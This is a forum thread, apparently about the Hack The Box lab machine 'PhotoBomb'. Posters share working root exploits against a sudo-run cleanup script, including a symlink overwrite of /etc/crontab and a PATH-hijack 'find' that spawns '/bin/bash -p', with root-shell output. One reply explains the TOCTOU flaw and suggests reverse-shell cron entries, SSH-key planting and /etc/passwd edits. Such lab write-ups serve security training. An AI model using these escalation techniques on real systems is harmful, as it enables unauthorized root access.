[quote="loge23" pid="621524" dateline="1665272154"]For root:[code]rm ~/photobomb/log/photobomb.log.bak;ln -s /etc/crontab ~/photobomb/log/photobomb.log.bakcp /etc/crontab ~/photobomb/log/photobomb.logecho "***** root " >> ~/photobomb/log/photobomb.logsudo /opt/cleanup.sh[/code][/quote]Good stuff!

[quote="loge23" pid="621524" dateline="1665272154"]For root:[code]rm ~/photobomb/log/photobomb.log.bak;ln -s /etc/crontab ~/photobomb/log/photobomb.log.bakcp /etc/crontab ~/photobomb/log/photobomb.logecho "***** root " >> ~/photobomb/log/photobomb.logsudo /opt/cleanup.sh[/code][/quote]btw bro why are you using photobomb.log.bak ? the cleanup script modifying .log.old file so adding symbolic link to .old file sould work ? am i correct ? if we create sym link to .log.bak then it wont change our cronatb file cause script is modifying .old file :sleepy:btw i directly edite cleanup.sh file XD

Get root:

cd /tmp
touch find
echo "/bin/bash -p" > find
chmod +x find
sudo PATH=/tmp:$PATH /opt/cleanup.sh

Output:

wizard@photobomb:/tmp$ sudo PATH=/tmp:$PATH /opt/cleanup.sh

sudo PATH=/tmp:$PATH /opt/cleanup.sh

root@photobomb:/home/wizard/photobomb#


root@photobomb:/home/wizard/photobomb# id

id

uid=0(root) gid=0(root) groups=0(root)

root@photobomb:/home/wizard/photobomb#

Yo Guys I Wrote An Script To Pwn THis Box at https://github.com/GOATFUCK69/HackTheBox-PhotoBomb-script Make Sure To Learn From It And Not Just Auto Run It :D

[quote="phuongvy" pid="634257" dateline="1665461753"][quote="elindio67" pid="621729" dateline="1665276725"][quote="loge23" pid="621524" dateline="1665272154"]For root:[code]rm ~/photobomb/log/photobomb.log.bak;ln -s /etc/crontab ~/photobomb/log/photobomb.log.bakcp /etc/crontab ~/photobomb/log/photobomb.logecho "***** root " >> ~/photobomb/log/photobomb.logsudo /opt/cleanup.sh[/code][/quote]I was like 10 minutes reading these 4 lines before i get it. This is a very clever solution! Thanks!![/quote]Can you explain it? I still can not understand exploit this method.[/quote]It works because in the cleanup script it checks if 'photobomb.log' is a symbolic link but doesn't check if 'photobomb.log.old' is one.So what this method does is delete 'photobomb.log.old' and recreate it as a symbolic link pointing to '/etc/crontab'.Then when the following line in the cleanup script is run with root privs:[code]/bin/cat log/photobomb.log > log/photobomb.log.old[/code]It effectively copies whatever is in 'photobomb.log' to 'photobomb.log.old' (which now points to '/etc/crontab'). And since as wizard we have write permissions to 'photobomb.log' we can plant crontab entries in there so that when the cleanup script is run it overwrites 'photobomb.log.old' and therefore overwrites '/etc/crontab'. Basically an arbitrary file write primitive. You can use it to for example plant a crontab entry that spawns a reverse shell, or copies and SUIDs a bash shell somewhere or anything really.There's other ways you could abuse this without crontab too like using it to write your public SSH key to root's 'authorized_keys', or adding entries to '/etc/passwd' and so on.Even if it did check if 'photobomb.log.old' was a symbolic link before the overwrite, you'd still have a TOCTOU vuln because the check and the write operation aren't atomic. In fact you have a TOCTOU here for 'photobomb.log' so that's another vector for elevation, between the time that it does the if statement with the test that the file exists, is a nonzero size and is not a symbolic link, to the time that it does the cat overwrite, you could delete 'photobomb.log' and recreate it as a symbolic link to '/root/root.txt', that should then overwrite 'photobomb.log.old' with the root flag.